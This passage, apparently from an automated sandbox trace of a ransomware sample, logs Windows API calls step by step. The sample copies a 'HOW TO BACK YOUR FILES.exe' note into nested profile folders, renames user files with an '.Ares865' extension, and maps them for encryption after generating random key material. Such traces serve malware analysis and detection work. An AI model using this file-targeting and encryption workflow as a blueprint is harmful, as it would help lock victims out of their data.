YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.129] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.130] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0066.130] GetLastError () returned 0x0 [0066.130] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.130] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.130] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0066.131] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0066.131] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.131] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.131] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0066.131] GetLastError () returned 0x0 [0066.131] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.131] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.132] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0066.132] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0066.132] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.132] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.133] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0066.133] GetLastError () returned 0x0 [0066.133] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.133] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.160] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Links\\desktop.ini.Ares865") returned 47 [0066.160] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Links\\desktop.ini" (normalized: "c:\\users\\default user\\links\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Links\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\links\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.161] CreateFileW (lpFileName="C:\\Users\\Default User\\Links\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\links\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.161] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=580) returned 1 [0066.161] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.162] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.162] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.162] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x550, lpName=0x0) returned 0x118 [0066.165] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x550) returned 0x420000 [0066.166] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.166] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.166] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.167] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Links\\Desktop.lnk.Ares865") returned 47 [0066.167] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Links\\Desktop.lnk" (normalized: "c:\\users\\default user\\links\\desktop.lnk"), lpNewFileName="C:\\Users\\Default User\\Links\\Desktop.lnk.Ares865" (normalized: "c:\\users\\default user\\links\\desktop.lnk.ares865"), dwFlags=0x1) returned 1 [0066.168] CreateFileW (lpFileName="C:\\Users\\Default User\\Links\\Desktop.lnk.Ares865" (normalized: "c:\\users\\default user\\links\\desktop.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.168] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=467) returned 1 [0066.168] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.169] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.169] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.169] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x118 [0066.171] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x420000 [0066.171] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.172] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.172] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.173] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Links\\Downloads.lnk.Ares865") returned 49 [0066.173] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Links\\Downloads.lnk" (normalized: "c:\\users\\default user\\links\\downloads.lnk"), lpNewFileName="C:\\Users\\Default User\\Links\\Downloads.lnk.Ares865" (normalized: "c:\\users\\default user\\links\\downloads.lnk.ares865"), dwFlags=0x1) returned 1 [0066.173] CreateFileW (lpFileName="C:\\Users\\Default User\\Links\\Downloads.lnk.Ares865" (normalized: "c:\\users\\default user\\links\\downloads.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.173] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=894) returned 1 [0066.174] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.174] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.174] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.175] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x680, lpName=0x0) returned 0x118 [0066.176] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x680) returned 0x420000 [0066.182] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.183] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.183] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.183] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Links\\RecentPlaces.lnk.Ares865") returned 52 [0066.183] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\default user\\links\\recentplaces.lnk"), lpNewFileName="C:\\Users\\Default User\\Links\\RecentPlaces.lnk.Ares865" (normalized: "c:\\users\\default user\\links\\recentplaces.lnk.ares865"), dwFlags=0x1) returned 1 [0066.184] CreateFileW (lpFileName="C:\\Users\\Default User\\Links\\RecentPlaces.lnk.Ares865" (normalized: "c:\\users\\default user\\links\\recentplaces.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0066.184] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=363) returned 1 [0066.184] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.185] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.185] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.185] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x470, lpName=0x0) returned 0x154 [0066.192] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x470) returned 0x190000 [0066.193] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0066.194] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.194] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0066.195] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\desktop.ini.Ares865") returned 51 [0066.195] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\desktop.ini" (normalized: "c:\\users\\default user\\favorites\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Favorites\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\favorites\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0066.200] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\favorites\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.200] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=402) returned 1 [0066.201] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.201] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.201] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.201] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a0, lpName=0x0) returned 0x118 [0066.204] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a0) returned 0x420000 [0066.205] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.205] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.205] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.207] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Windows Live\\Get Windows Live.url.Ares865") returned 73 [0066.207] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default user\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Get Windows Live.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\windows live\\get windows live.url.ares865"), dwFlags=0x1) returned 1 [0066.207] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Get Windows Live.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\windows live\\get windows live.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.208] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.208] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.209] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.209] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.209] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.211] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.211] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.212] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.212] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.212] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Gallery.url.Ares865") returned 77 [0066.212] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default user\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Gallery.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\windows live\\windows live gallery.url.ares865"), dwFlags=0x1) returned 1 [0066.215] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Gallery.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\windows live\\windows live gallery.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.216] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.216] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.217] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.217] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.217] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.221] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.222] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.222] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.222] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Mail.url.Ares865") returned 74 [0066.223] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default user\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Mail.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\windows live\\windows live mail.url.ares865"), dwFlags=0x1) returned 1 [0066.224] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Mail.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\windows live\\windows live mail.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.224] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.224] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.225] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.225] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.225] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.227] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.227] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.228] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.228] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.229] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Spaces.url.Ares865") returned 76 [0066.229] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default user\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Spaces.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\windows live\\windows live spaces.url.ares865"), dwFlags=0x1) returned 1 [0066.229] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\Windows Live\\Windows Live Spaces.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\windows live\\windows live spaces.url.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0066.230] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=133) returned 1 [0066.230] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0066.231] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0066.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.231] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x118 [0066.232] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x420000 [0066.233] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0066.234] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0066.234] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0066.235] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Autos.url.Ares865") returned 66 [0066.235] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\Default User\\Favorites\\MSN Websites\\MSN Autos.url.Ares865" (normalized: "c:\\users\\default user\\favorites\\msn websites\\msn autos.url.ares865"), dwFlags=0x1) returned 1 [0066.235] CreateFileW (lpFileName="C:\\Users\\Default User\\Favorites\\MSN 